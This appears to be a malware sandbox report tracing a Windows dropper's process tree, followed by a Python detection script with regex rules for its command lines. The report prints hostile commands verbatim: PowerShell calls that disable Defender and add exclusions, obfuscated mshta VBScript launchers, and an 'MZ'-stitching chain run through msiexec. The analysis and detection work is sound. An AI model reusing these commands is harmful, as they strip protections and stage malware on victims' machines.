N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4252 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4252 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4252 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1712 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe
PID 1712 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe
PID 1712 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe
PID 1656 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1044 wrote to memory of 4884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 4884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 4884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 3640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 3640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 3640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1656 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4876 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe
PID 4876 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe
PID 4876 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe
PID 1772 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe

Processes

C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe

"C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu126011caea28.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe

Thu12ca1c119bc29.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe

Thu122f7469b214cb59.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe

Thu1262fd911d3e6320.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe

Thu1231d30cda84872.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe

Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe

Thu124078ed79bdbd5.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe

Thu123e05ebe43921.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12b275ee70c7e913.exe

Thu12b275ee70c7e913.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe

Thu12493eba7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe

Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe

Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu120bfbc2443b3b5d.exe

Thu120bfbc2443b3b5d.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1656 -ip 1656

C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp" /SL5="$50114,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe

Thu12465fe68f85b6156.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 612

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp" /SL5="$7027C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe" ) do taskkill -f -Im "%~nXQ"

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe

yDhNY.exe /pFKkSWJQc5v2ppVFMo

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2276 -ip 2276

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -Im "Thu12493eba7a.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 360

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" ) do taskkill -f -Im "%~nXQ"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe (CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 " , 0 ,trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -Y .\ISA502G.S7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc46a3cc40,0x7ffc46a3cc4c,0x7ffc46a3cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2604 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4588 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4128 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5004,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
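
The process list above is also the input a detection engineer would test rules against. The Python below is an added example written for this page, not code from the sandbox or from any family named in the report: it runs case-insensitive command-line rules over lines copied verbatim from the list (the Defender Set-MpPreference/Add-MpPreference calls, the mshta VBScript one-liner, the cmd.exe chain that echoes an "MZ" header and stitches fragments together with copy /b, msiexec -Y, taskkill) and adds a crude randomised-case heuristic. Rule names, weights and the 0.5 flip-ratio threshold are the editor's assumptions; that msiexec /y (-Y) calls DllRegisterServer on the named file is documented msiexec behaviour.

```python
"""Command-line triage over the Processes section of the sandbox report.

Added example, not part of the report. The sample input is copied verbatim
from the Processes section; rule names and weights are the editor's choices.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: command lines copied from the report's Processes section.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable',
    r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"',
    r'"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )',
    r'"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7',
    r'msiexec.exe -Y .\ISA502G.S7',
    r'taskkill /f /im chrome.exe',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe"',
]

# (rule name, pattern, weight). Every pattern is case-insensitive because the
# sample randomises letter case ("creATeoBjEct", "CopY /b").
RULES = [
    # Microsoft Defender tampering via the Set-MpPreference / Add-MpPreference cmdlets
    ("defender_realtime_off",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.I), 10),
    ("defender_cloud_off",
     re.compile(r"-MAPSReporting\s+Disable|-SubmitSamplesConsent\s+NeverSend", re.I), 5),
    ("defender_exclusion_added",
     re.compile(r"Add-MpPreference\b.*-ExclusionPath", re.I), 8),
    # LOLBin chain: mshta running inline VBScript that shells out through WScript.Shell
    ("mshta_inline_vbscript", re.compile(r'mshta(\.exe)?"?\s+vbscript:', re.I), 9),
    ("wscript_shell_run",
     re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)\s*\.\s*Run', re.I), 6),
    # A PE assembled on disk: "MZ" written with set /p, fragments joined with copy /b
    ("mz_header_stitching", re.compile(r'set\s*/p\s*=\s*"?MZ"?|copy\s+/b\s+/y', re.I), 7),
    # msiexec /y (-y) calls DllRegisterServer on the named file: DLL execution via a signed binary
    ("msiexec_regserver", re.compile(r"msiexec(\.exe)?\s+[-/]y\b", re.I), 9),
    ("taskkill_force_image", re.compile(r"taskkill\b.*[-/]f\b.*[-/]im\b", re.I), 3),
    ("touches_user_temp", re.compile(r"\\AppData\\Local\\Temp\b", re.I), 2),
]


@dataclass
class Verdict:
    cmdline: str
    hits: list = field(default_factory=list)
    score: int = 0
    odd_case: list = field(default_factory=list)


def case_flip_ratio(token: str) -> float:
    """Fraction of adjacent letter pairs that change case; 'creATeoBjEct' -> 0.5."""
    flips = sum(1 for a, b in zip(token, token[1:]) if a.isupper() != b.isupper())
    return flips / len(token)


def odd_case_tokens(cmdline: str, min_len: int = 5, threshold: float = 0.5) -> list:
    """Alphabetic runs whose case flips unusually often (randomised-case obfuscation)."""
    seen = []
    for tok in re.findall(r"[A-Za-z]+", cmdline):
        if len(tok) >= min_len and case_flip_ratio(tok) >= threshold and tok not in seen:
            seen.append(tok)
    return seen


def triage(cmdline: str) -> Verdict:
    """Apply every rule; the score is the sum of the weights of the rules that fire."""
    v = Verdict(cmdline=cmdline)
    for name, rx, weight in RULES:
        if rx.search(cmdline):
            v.hits.append(name)
            v.score += weight
    v.odd_case = odd_case_tokens(cmdline)
    return v


def triage_all(cmdlines) -> list:
    """Highest score first; the sort is stable, so ties keep report order."""
    return sorted((triage(c) for c in cmdlines), key=lambda v: -v.score)


if __name__ == "__main__":
    for v in triage_all(SAMPLE_CMDLINES):
        print(f"{v.score:3d} {','.join(v.hits) or '-'} odd_case={v.odd_case} :: {v.cmdline[:70]}")
```

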